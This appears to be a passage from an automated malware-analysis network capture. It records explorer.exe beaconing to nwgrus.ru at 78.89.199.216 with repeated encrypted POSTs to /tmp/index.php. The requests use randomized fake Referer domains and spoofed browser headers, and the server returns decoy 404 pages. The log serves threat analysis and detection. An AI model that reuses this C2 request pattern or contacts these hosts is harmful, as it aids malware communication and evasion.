<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49774	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 17:02:59.385839939 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://baalviblkbjsp.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 160 Host: nwgrus.ru
Oct 13, 2024 17:02:59.385839939 CEST	160	OUT	Data Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 1e 6b 2c 90 f5 76 0b 75 5e 1b ed a5 Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA -[k,vu^G[}_nKzL?;q2[AEa>#[o129E
Oct 13, 2024 17:03:00.567207098 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 15:03:00 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49785	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 17:03:00.580315113 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://gwngaiusekur.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 286 Host: nwgrus.ru
Oct 13, 2024 17:03:00.583970070 CEST	286	OUT	Data Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 1f 6b 2c 90 f5 76 0b 75 66 2d c8 82 Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA -[k,vuf-^KUZZ e6g{<{G"Uxn>/xc4^+f&%%AE"W_NH}ch@vX0_-y!8m
Oct 13, 2024 17:03:01.794980049 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 15:03:01 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49794	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 17:03:01.839550972 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://mxjrhmxwrwqyxs.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 316 Host: nwgrus.ru
Oct 13, 2024 17:03:01.839601040 CEST	316	OUT	Data Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 1c 6b 2c 90 f5 76 0b 75 7a 41 db 82 Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA -[k,vuzAR:}ec31pN'I@[d?K@W\EQ!BqaOH#D<sh!CvCS0d+_bTHl
Oct 13, 2024 17:03:03.054527998 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 15:03:02 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49802	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 17:03:03.064747095 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://fcwffmgjsqp.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 343 Host: nwgrus.ru
Oct 13, 2024 17:03:03.064793110 CEST	343	OUT	Data Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 1d 6b 2c 90 f5 76 0b 75 47 00 ad f3 Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA -[k,vuGoA\i8}\H9w]Th?P+4gVaF&*@:8\[GyEkVB$eUvM$zJyl7m
Oct 13, 2024 17:03:04.301119089 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 15:03:04 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49810	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 17:03:04.311893940 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://vthbbsgwufn.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 132 Host: nwgrus.ru
Oct 13, 2024 17:03:04.311893940 CEST	132	OUT	Data Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 12 6b 2c 90 f5 76 0b 75 72 2a aa eb Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA -[k,vur*s!j_HkXV6)0Cx
Oct 13, 2024 17:03:05.654290915 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 15:03:05 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49819	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 17:03:05.663530111 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://xohyaostsydxib.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 247 Host: nwgrus.ru
Oct 13, 2024 17:03:05.663530111 CEST	247	OUT	Data Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 13 6b 2c 90 f5 76 0b 75 2b 3b da aa Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA -[k,vu+;q,RFWDL{\|wACiUABc)N)'ASau(XlW`zZBCG]RH"rFO\-VvzPX$q
Oct 13, 2024 17:03:06.907557964 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 15:03:06 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49828	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 17:03:07.017113924 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://wbpwgsalvbneixte.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 238 Host: nwgrus.ru
Oct 13, 2024 17:03:07.017113924 CEST	238	OUT	Data Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 10 6b 2c 90 f5 76 0b 75 25 5d e4 fc Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA -[k,vu%]\C NNr3r{R+r1!^0oRqKP@4k.2O&Bd`3DD<`Hz}./vo_=\|n
Oct 13, 2024 17:03:08.189560890 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 15:03:07 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49836	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 17:03:08.198231936 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://pbysepknkik.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 136 Host: nwgrus.ru
Oct 13, 2024 17:03:08.198271036 CEST	136	OUT	Data Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 11 6b 2c 90 f5 76 0b 75 3f 3f e2 92 Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA -[k,vu??p?QEcdTU/>-[Gy
Oct 13, 2024 17:03:09.445173025 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 15:03:09 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49845	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 17:03:09.453996897 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ijtbudkgjdatnpve.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 190 Host: nwgrus.ru
Oct 13, 2024 17:03:09.454029083 CEST	190	OUT	Data Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 16 6b 2c 90 f5 76 0b 75 4a 26 ea a0 Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA -[k,vuJ&j%qL`*DL)YF'Po+A!eWa10zD=']u2
Oct 13, 2024 17:03:10.849014997 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 15:03:10 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49856	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 17:03:10.913814068 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://rjwxfpemkdjwjc.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 249 Host: nwgrus.ru
Oct 13, 2024 17:03:10.913814068 CEST	249	OUT	Data Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 17 6b 2c 90 f5 76 0b 75 3f 4c c4 83 Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA -[k,vu?L3rMaNssn.;hHVB#!oTy,&&k=i/zK12W69E;rwP\RCK%
